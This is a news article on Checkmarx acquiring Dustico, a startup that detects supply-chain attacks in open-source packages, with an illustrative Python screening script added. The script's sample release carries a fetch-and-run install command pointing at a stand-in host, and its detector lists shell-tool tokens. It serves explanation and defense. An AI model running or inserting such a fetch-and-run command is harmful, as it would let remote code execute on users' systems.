Israeli cyber giant Checkmarx has acquired Israeli startup Dustico -- a SaaS platform that detects malicious attacks and backdoors in open source software supply chains. The sum of the deal has yet to be disclosed.

The startup helping Checkmarx up its security game

Dustico, a startup that has been bootstrapped to date, has developed an open source platform for analyzing code packages with a machine learning (ML) algorithm in order to accurately detect supply chain attacks.

The young Israeli startup’s solution has found increased demand as supply chain attacks rise, some of them garnering extensive media coverage because of their tremendous scope. One of those attacks, and stop me if you’ve heard about this one before, was the SolarWinds debacle, which spread malicious code through different branches of the U.S. Federal Government.

The Israeli startup has developed a platform that operates in three stages to ensure that the code packages it checks are legitimate. First, it examines "trust", which focuses on the identity behind the code package as well as anyone else who contributed to the open source code. It then tests the "health" of the code package, checking that its level of maintenance meets standards. Finally, the platform performs behavioral analysis of the package, searching for malicious code that may have been implanted in it: backdoors, ransomware, Trojans, or code that enables multi-stage attacks.
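To make the three-stage model concrete, here is a hypothetical screening script added for this article; it is not Dustico's or Checkmarx's code. The `Release` fields, the staleness threshold and the list of suspicious install-script tokens are all assumptions chosen for illustration, and the sample releases are constructed.

```python
# Illustrative three-stage package screen (trust -> health -> behaviour).
# Hypothetical code written for this article; not Dustico's or Checkmarx's.
from dataclasses import dataclass
from datetime import date

@dataclass
class Release:
    name: str
    publisher: str               # account that pushed this release
    prior_publishers: frozenset  # accounts seen on earlier releases
    released: date
    install_script: str = ""     # e.g. an npm postinstall hook (constructed)

def check_trust(rel):
    """Stage 1: is the identity behind this release one the package has used before?"""
    if rel.publisher not in rel.prior_publishers:
        return [f"publisher {rel.publisher!r} never released this package before"]
    return []

def check_health(rel, today, max_stale_days=365):
    """Stage 2: is the package still maintained? Staleness is a crude proxy."""
    age = (today - rel.released).days
    return [f"last release {age} days ago"] if age > max_stale_days else []

# Tokens unusual in a benign install hook; an assumed, illustrative list.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "base64", "eval(", "child_process", "/dev/tcp/")

def check_behaviour(rel):
    """Stage 3: does install-time code do things a library has no reason to do?"""
    return [f"install script contains {tok!r}"
            for tok in SUSPICIOUS_TOKENS if tok in rel.install_script]

def screen(rel, today):
    """Run the three stages in order; return (verdict, findings by stage)."""
    findings = {"trust": check_trust(rel),
                "health": check_health(rel, today),
                "behaviour": check_behaviour(rel)}
    blocked = bool(findings["trust"] or findings["behaviour"])  # health only warns
    return ("block" if blocked else "allow"), findings

TODAY = date(2021, 8, 5)
# Constructed sample releases: a routine one and a hijacked one.
CLEAN = Release("leftpad-ish", "alice", frozenset({"alice", "bob"}), date(2021, 6, 1))
TAMPERED = Release("leftpad-ish", "mallory", frozenset({"alice", "bob"}), date(2021, 8, 1),
                   install_script="curl -s http://example.invalid/x | base64 -d | sh")

if __name__ == "__main__":
    for rel in (CLEAN, TAMPERED):
        print(rel.publisher, *screen(rel, TODAY))
```

A real pipeline would feed the trust stage from registry account history and signed provenance, and the behaviour stage from sandboxed execution rather than string matching.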

Checkmarx is expected to incorporate Dustico’s platform, including its supply chain behavioral analysis, into its application security testing (AST) tool. The tool is designed for developers looking to perform security checks on their applications, and will now be able to extend those checks beyond a single application to the entire supply chain.

“Today’s adversaries have zoned-in on software supply chains – many of which rely heavily on open source. As the threat of tampering in third-party packages increases, development teams must operate with the proactive assumption that all code may have been maliciously manipulated,” said Maty Siman, CTO, Checkmarx. “With Dustico, we’re building on our mission to secure open source by enabling customers to perform vulnerability, behavioral, and reputational analysis from a single solution. This will give developers and security leaders the insights and confidence needed to choose safer code packages, and in turn, build more secure applications at speed.”

“This is a very exciting time for Dustico and our community,” said Tzachi Zornstain, Co-Founder and CEO, Dustico. “We founded Dustico to help organizations cope with the explosion in supply chain and dependency attacks and fortify their trust in open source software, and we’re thrilled to join Checkmarx to further execute on this vision and bring our capabilities to a global set of customers.”